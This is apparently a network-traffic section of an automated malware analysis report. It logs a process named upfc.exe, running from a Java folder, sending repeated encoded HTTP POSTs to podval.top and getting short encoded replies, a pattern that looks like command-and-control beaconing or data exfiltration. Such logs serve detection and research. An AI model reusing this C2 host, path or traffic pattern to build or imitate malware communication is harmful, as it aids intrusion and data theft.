                                                    Jul 3, 2024 16:42:13.684294939 CEST  1060               OUT        Data Raw: 5f 5b 5f 55 5b 57 52 5d 58 56 55 51 50 58 59 52 55 58 5e 54 51 5b 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _[_U[WR]XVUQPXYRUX^TQ[S]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"&_8D3)/Y'3 (>-V \.-!Z$%!$3#R8$"14[,"['$Y !
                                                    Jul 3, 2024 16:42:13.740359068 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:14.105528116 CEST  574                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:14 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UPz4R4LT5H2DWvPrOLIpKBHtYOnYfkqf6ty9zjxOxXbRWFUY1oegtS4hYzGBWgwNgNaWUWwZSq2X4AGe4w5iMAthz6q6DfP6i81AhejsoxLmQ9ZcZk7tZV54xFeQ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4139edb8c05-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    4           192.168.2.10  49714        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:14.297962904 CEST  270                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:14.651113987 CEST  1060               OUT        Data Raw: 5a 55 5f 5c 5b 5e 57 5f 58 56 55 51 50 58 59 50 55 59 5e 54 51 55 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZU_\[^W_XVUQPXYPUY^TQUS_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"X1_8D&)03 *W [=9=!Z':'33S;X7 Z/"['$Y !
                                                    Jul 3, 2024 16:42:14.773724079 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:15.122445107 CEST  584                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:15 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sAmfKKWre4HwK6FnWVHk8UL%2FOwvARMTt2QNP0oEon9Lgmnbgcx7b%2Fs2C8joY%2BBiDGPFR0cWncrwpgpjuUky%2BIQMttEyEcEbW81FxPiq%2Bf2G1YJk6OC0myB6Hqr0D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a41a0a318c69-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    5           192.168.2.10  49715        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:14.859704018 CEST  272                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 154732
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:15.308759928 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:16.435770988 CEST  582                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:16 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZRe094oetI%2F0PXyCTJ3cl6ShKFoG8idhrcqgao3vLB7cIncbPicZYSoakKpzwOqgZtqz%2FSn4L0r59Hjwbcq6n8IYYzMCslbSZJv%2FAnC01gKCu%2FYDH8E6F3I9Cns9"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a41d6c3a1a07-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    6           192.168.2.10  49716        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:15.332123041 CEST  270                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:15.682183027 CEST  1060               OUT        Data Raw: 5a 56 5a 5e 5b 5d 52 58 58 56 55 51 50 58 59 55 55 5b 5e 55 51 5b 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZVZ^[]RXXVUQPXYUU[^UQ[SWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!&9?$#]$;(.T#=:=9$)%00,>X"28,"['$Y !
                                                    Jul 3, 2024 16:42:15.781455994 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:16.129295111 CEST  582                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:16 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3QoNAUPPPgLgOiER4eHthpx9vzCiw%2F6CqGrNmhOEqpZ9BLy9M4WtjeHO1wwEXMatZT0XmNyP%2BD2ErTXLSYLMEbvmYU%2FFsYhuLWobmpoILQjky387EC3Su0Za%2B7xe"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4205e8741e1-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    7           192.168.2.10  49719        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:16.285402060 CEST  270                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:16.635624886 CEST  1060               OUT        Data Raw: 5f 5a 5f 5d 5b 58 57 5a 58 56 55 51 50 51 59 54 55 5f 5e 58 51 5f 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _Z_][XWZXVUQPQYTU_^XQ_SVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"X19#3)^$3 (.9#-2:*0)\3U 8=;#,<"['$Y
                                                    Jul 3, 2024 16:42:16.745060921 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:16.949011087 CEST  584                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:16 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ykFempdKoUTNXMbvbwQ9o7%2FOob%2Fdv8zvL31fbnxE0%2FGoMDrX48MD41In4mVHKw%2FOteTY9KFLuhdK0p5je5F8wPG230CKDa3Fh6mCSIj8wbEBmt7ApBdIu%2FUo3LAt"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a42659ad728f-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    8           192.168.2.10  49722        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:17.092459917 CEST  270                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    9           192.168.2.10  49723        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:17.392743111 CEST  294                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:17.744534969 CEST  1772               OUT        Data Raw: 5a 52 5a 59 5b 5a 57 59 58 56 55 51 50 50 59 5a 55 5d 5e 5a 51 58 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZRZY[ZWYXVUQPPYZU]^ZQXSYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Y&9/$*8%0Z>X% 5].>>'C6$?R/>#!78"['$Y
                                                    Jul 3, 2024 16:42:17.868181944 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:18.210037947 CEST  731                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:18 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UAW%2BtdHS0f3I54zdelmtlkJpbNnBHZQTjMJhmPWy9K291b6mvsyv%2Bpxn8caCvzk0f8x2HuEdQSiVzyTQa9tcXYNfZsaL%2BhP4M4GCEiyENwEonv9rWDEo%2B9HY4543"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a42d6ae6728a-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 5f 26 03 31 10 32 0b 33 16 2e 13 23 50 2b 03 27 07 3b 00 35 5a 3c 24 00 02 39 2e 2e 51 20 39 3e 5d 3f 3f 2c 5e 31 33 3f 0d 35 1b 20 5b 04 1c 23 5d 3f 04 35 13 3c 06 20 0a 26 05 32 1e 27 09 2a 03 33 28 2d 0a 33 16 0d 5b 3c 16 3a 0e 33 21 38 03 2b 38 29 02 28 27 32 5b 20 34 21 54 02 13 21 08 33 13 39 55 23 30 27 53 32 0e 32 07 24 42 2b 51 25 30 22 53 29 0d 35 0d 27 0f 30 11 35 01 0d 57 33 01 26 5c 24 2d 00 03 21 38 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%_&123.#P+';5Z<$9..Q 9>]??,^13?5 [#]?5< &2'*3(-3[<:3!8+8)('2[ 4!T!39U#0'S22$B+Q%0"S)5'05W3&\$-!8#_+)V3YT0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    10          192.168.2.10  49724        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:17.579336882 CEST  294                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:17.932447910 CEST  1060               OUT        Data Raw: 5a 50 5a 5f 5e 5a 52 5a 58 56 55 51 50 51 59 55 55 5e 5e 5d 51 55 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZPZ_^ZRZXVUQPQYUU^^]QUS_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[1,D0']0 #[)-.#":>35"$;871+,"['$Y
                                                    Jul 3, 2024 16:42:18.051175117 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:18.397026062 CEST  586                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:18 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GuJFWIGGWlqIm1w%2BkMpokhJhNUUQ4j9I5ygcwKuATHWXULIWaVjONELdRbcqM53zpR99%2BQpWM8zEHcwZqPUp7QmBY29M%2B%2Bh63zSlH%2BGRsETQ8%2FPzL5HfqHHf4TSi"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a42e8d904362-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    11          192.168.2.10  49728        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:18.569711924 CEST  270                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:18.916588068 CEST  1060               OUT        Data Raw: 5f 51 5f 5c 5e 5b 52 5c 58 56 55 51 50 5f 59 57 55 58 5e 54 51 5a 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _Q_\^[R\XVUQP_YWUX^TQZSVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"X2?3);$ *W -":X$'08?[72$;"['$Y =
                                                    Jul 3, 2024 16:42:19.021759033 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:19.390098095 CEST  590                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:19 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xMafNFBZe%2FDSy6RadHq0rnUENK6enfkdIw%2BahCA%2Fa3KPYqq9%2FHzfs7cXDCoqfCf9D%2FZwrmCZso1B1oJE3HzuOfsDkY09MVP3bDzdxLMkPJLCgeV%2BkQD%2B%2F17jXuYf"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4349d8a0f95-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    12          192.168.2.10  49729        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:19.524100065 CEST  294                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:19.869524002 CEST  1060               OUT        Data Raw: 5a 55 5a 5e 5e 5b 57 50 58 56 55 51 50 5b 59 50 55 5e 5e 5d 51 5e 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZUZ^^[WPXVUQP[YPU^^]Q^S]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"'9B&)']0 Z(.* [5Y-X%365'3</.Z#$/"['$Y -
                                                    Jul 3, 2024 16:42:19.990917921 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:20.323458910 CEST  584                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:20 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Md8A3fCBqYWB7OB0%2FWqNSyrYsUAXz7jiJoNcgZXppwrUBgCr%2BTz2ICXHWE2gxxJq%2F6%2BKkdQh6EHn2hBrflO9mS4X9Q%2BcoynYQzCfJZbQOhYGxZwGP0Pmy9G3mTtJ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a43aaa24427f-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    13          192.168.2.10  49730        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:20.455785036 CEST  294                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:20.811794043 CEST  1060               OUT        Data Raw: 5f 5b 5f 5d 5e 58 57 5f 58 56 55 51 50 5c 59 55 55 5c 5e 55 51 5e 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _[_]^XW_XVUQP\YUU\^UQ^S\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"%<D0/Y0+Z=-)T7[69>]3$#?T,.7_4;<"['$Y 1
                                                    Jul 3, 2024 16:42:20.931277037 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:21.262813091 CEST  578                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:21 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UiTRNH50VGXjChyFENzVrDztopTrEDgtlKMGluWaNYEgiWZn03QS0GZNjFRriZnNglvfQVGEOc4DIxBncN3RWPfki6VSVnhZIn%2BDR%2BulEwBeltmu9RNia2oGMjWj"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4408d1e41ba-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    14          192.168.2.10  49731        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:21.406968117 CEST  294                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:21.760194063 CEST  1060               OUT        Data Raw: 5f 5b 5f 5d 5b 5c 57 59 58 56 55 51 50 50 59 56 55 58 5e 5b 51 5e 53 5a 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _[_][\WYXVUQPPYVUX^[Q^SZSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"%#'?$ )R#.&,>&'%'+T/X#X 4[-<"['$Y
                                                    Jul 3, 2024 16:42:21.859070063 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:22.196830988 CEST  586                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:22 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z8o5fSBPvUgS1u0Rzw%2FkU1zFUWw6ziPD5%2FWiplpswvCD0kMQt%2FMyMQ5Kl9Vig%2Bs7Qfw9pSMlC1mM7GPjQgiO3W7pbWTFoLGI%2FJobLHETI2Gwfmi09xboYMZCD%2FNQ"}],"group":"cf-nel","max_age":604800}
